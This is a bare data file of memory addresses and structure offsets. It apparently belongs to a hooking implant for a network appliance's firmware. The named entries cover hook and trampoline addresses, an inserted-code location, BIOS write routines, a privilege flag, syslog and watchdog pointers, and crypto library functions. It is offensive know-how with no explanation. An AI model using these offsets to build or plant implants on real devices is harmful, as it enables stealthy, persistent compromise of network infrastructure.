; --- SECTION I ---
;
0x40085100
0x2498000 
0x0   0x08cb2760
0x1   0x08cb24a0
0x2   0x0806e670
0x3   0x084f3620
0x4   0x0806eb70
0x5   0x08b1a250
0x6   0x09512c14
0x7   0x094ef8c0
0x8   0x094eea20
0x9   0x094eeb60
0xa   0x0806c600
0xb   0x00000014
0xc   0x00000010
0xd   0x00000098
0xe   0x0000007c
0xf   0x094f1890
0x15  0x08069600
0x16  0x0806a7e0
0x17  0x0806a1b0
0x18  0x08a892e0
0x19  0xffffffa0
0x1a  0xffffefc8
0x1b  0x04          //0x08850db7
0x1c  0x0c          //0x0806ebbb
0x1d  0x24
0x1e  0x10
0x1f  0x20
0x20  0x0866d430
0x21  0x0866e0f0
0x22  0x0866c520
0x23  0x0867ebe0
0x24  0x089e7820
0x25  0x089e6f20
0x26  0x0866a580
0x27  0x0866ffa0
0x28  0x08ae7510
0x2a  0x68
0x2b  0x60
0x2c  0x44
0x2e  0x000001b4
0x2f  0x0a1383a0
0x30  0x0a127c44
0x31  0x00000014
0x32  0x00000018
0x33  0x000000e8
0x34  0x0a1495f0
0x35  0x0a2a3d94
0x36  0x08ae94a0
0x37  0x000000e7
0x38  0x10
0x39  0x00
0x3a  0x00001028
0x3b  0x084fa640
0x3c  0x084fa560
0x3d  0x084fadd0
0x3e  0x084fa7c0
0x3f  0x00000040
0x40  0x0a2eeee0
0x42  0x0950fa02
0x43  0x0865a820
0x44  0x0841348f
0x45  0x01f8b8e0
0x46  0xffffffff
0x49  0x08048000
0x4a  0x09b18e40
0x52  0x086af130
;
; --- END OF SECTION I ---
;
:EOS:
;
; --- SECTION II ---
;
HookLocation              0x08890520
HookedCall                0x088961c0
JmpLocation               0x0950fa04
InterfaceAddr             0x0a127c44
InterfaceLeng             0x000001ac
IntSecurityOffset         0xffffffa0
IntNameOffset             0x0000017c
IntNumOffset              0x000000e7
IntVlanOffset             0x10
IntIPOffset               0x18
IntNetmaskOffset          0x1c
FlashClassAddr            0x00000000
ArpTableAddrPtr           0x09c2ae14
NumInterfaces             0x00000000
IfaceStruct2              0x00000000
IfaceStruct2Len           0x00
BiosClassAddr             0x0a2bef40
BiosWriteAddr1            0x084062f0
BiosWriteAddr2            0x0840a460
BiosWriteAddr3            0x08409e50
BiosWriteAddr4            0x0840acd0
BiosWriteOffset           0x00000020
GetPlatformStringAddr     0x09503330
AnnounceFunc              0x0806e7c0
DevIoctlOffset            0x70
DuartTtyAddr              0x09b97c40
CIStartFunc               0x080e62b0
CommandListAddr           0x09c86be0
DeviceListPtrAddr         0x0a09ba6c
DeviceNextPtrOffset       0x50
StrcmpFuncAddr            0x094f4ff0
SyslogFlagPtrAddr         0x0a4719e0
PGDGETValue               0x85b00002
PGDPUSHValue              0x85b00003
PGDSETValue               0x85b00000
StdChOffset               0x90
StdErrOffset              0x94
PrivFlagOffset            0x0c
UnameOffset               0x14
EnvPtrOffset              0x9c
SyslogOffset              0x00000d84
Open                      0x0806e670
ChannelConfigOffset       0x08
InputModeOffset           0x14
InputModeEsc              0x20
WatchDogTimeout           0x09b1a5c0
UpTimeCounter             0x0a2a3d94
Display_uptime_addr       0x080ed490
Inserted_code_addr        0x085eb891
i2cReadByte               0x094d4cd0
i2cWriteByte              0x094d59a0
CLIHookAddress            0x080effb5
AvailMemoryPtr            0x0a40d378
;
;
srand                     0x094f1870
BN_new                    0x09411ab0
BN_free                   0x0891df60
BN_mod_exp                0x0944a6f0
BN_CTX_new                0x0942fd70
BN_CTX_free               0x09430160
BN_bin2bn                 0x09411fb0
BN_bn2bin                 0x09411cd0
BN_bn2hex                 0x094329e0
BN_num_bits               0x09411c50
DH_p                      0x09b60920
EVP_CIPHER_CTX_init       0x09416730
EVP_CipherUpdate          0x09416f10
EVP_CIPHER_CTX_cleanup    0x094166d0
EVP_CipherFinal           0x094172b0
EVP_CipherInit_ex         0x094177c0
EVP_aes_128_cbc           0x094197f0
slimHookAddr              0x08890cc1
slimTrampoline1           0x0805a561
slimTrampoline2           0x08079bc1
HookByte1                 0x8b
HookBytes2to5             0xff85e47d
InterfaceOffset           0x0000000c
codepageBase              0x00000000
osVerAddr                 0x09b194c0
textSize                  0x01543ef0
;
; --- END OF SECTION II ---
;
:EOS:
;
